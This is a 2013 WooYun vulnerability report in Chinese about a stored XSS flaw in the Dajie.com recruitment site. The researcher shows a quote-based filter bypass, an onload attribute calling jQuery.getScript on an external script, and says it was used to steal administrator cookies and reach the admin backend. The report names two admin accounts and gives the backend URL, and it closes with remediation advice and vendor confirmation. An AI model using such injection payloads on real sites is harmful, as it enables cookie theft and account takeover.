当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017407

漏洞标题:我是如何绕过大街网的限制继续xss的(蠕虫、盗cookie、成功登录后台)

相关厂商:大杰世纪科技发展(北京)有限公司

漏洞作者: px1624

提交时间:2013-01-17 10:35

修复时间:2013-03-03 10:35

公开时间:2013-03-03 10:35

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-17: 细节已通知厂商并且等待厂商处理中
2013-01-17: 厂商已经确认,细节仅向厂商公开
2013-01-27: 细节向核心白帽子及相关领域专家公开
2013-02-06: 细节向普通白帽子公开
2013-02-16: 细节向实习白帽子公开
2013-03-03: 细节向公众公开

简要描述:

标题模仿了一下@风萧萧,感觉这种形式的标题蛮霸气的。之前提交的大街网储存型xss,可以蠕虫,可以盗cookie。厂商将之前那个修补了,然后这次又被我给绕过了、、、还弄到了管理员cookie,进入了后台。。。。

详细说明:

前情提要:
1 大街网职场真心话处,存在xss。post数据中的<img>标签的src属性,可以通过修改数据插入特殊符号。之前用<script src=xxx></script>的方式插入调用外部js的代码,并且成功盗取cookie,并可以蠕虫。
2 今天去看了下,大街网已经将那个漏洞给修补了,过滤了<,>和&。但是"又没过滤了。。
之前的恶意代码是

"><script src=xxx></script>


现在只需要稍微的将代码修改下,即可绕过

"onload="jQuery.getScript('xxx')


3 看图,用charles修改的post数据

1.jpg


4 下面是弄到的管理员cookie,进入的后台(竟然段时间内就弄了两个管理员账号,看来管理员积极性很高诶、、、)
后台地址

http://ox.dajie.com/backaudit.do?m=question


2.jpg


3.jpg


4.jpg


5.jpg


具体盗cookie和蠕虫证明演示,我这里就不写了,详情请看我之前发的这个帖子,写的很直观详细。
WooYun: 大街网某功能储存型XSS,导致可以在首页等位置蠕虫 + 盗取用户登录cookie

漏洞证明:

1 post数据中,可以插入"并且成功构造恶意xss代码已经在上面证明和描述了。
2 具体的盗取cookie和蠕虫的利用,请看这个帖子
WooYun: 大街网某功能储存型XSS,导致可以在首页等位置蠕虫 + 盗取用户登录cookie
3 打入后台的证明,上面也有图,里面的内容我就看了看,shell之类的东西也没传,其他内容也没去弄,不过看了下,你们那个后台貌似啥防御措施都么有(汗、、、)
而且短时间内竟然弄到了两个管理员账号,分别是yuan.long和qian.wang,这两位管理看来工作热情很高额、
(最后:偶是良民诶,求良民奖!)

修复方案:

1 过滤'"></\&等特殊字符
2 post数据中加token
3 后台还是设置内网登录限制吧
4 cookie最好http-only下
5 管理员最好每次操作完毕后,安全退出,不要直接关了网页就完事了。。。切记不要记住密码诶、、、
6 你们的礼物很喜欢,还有么有了?

版权声明:转载请注明来源 px1624@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-01-17 15:15

厂商回复:

感谢您对大街网的支持~

最新状态:

暂无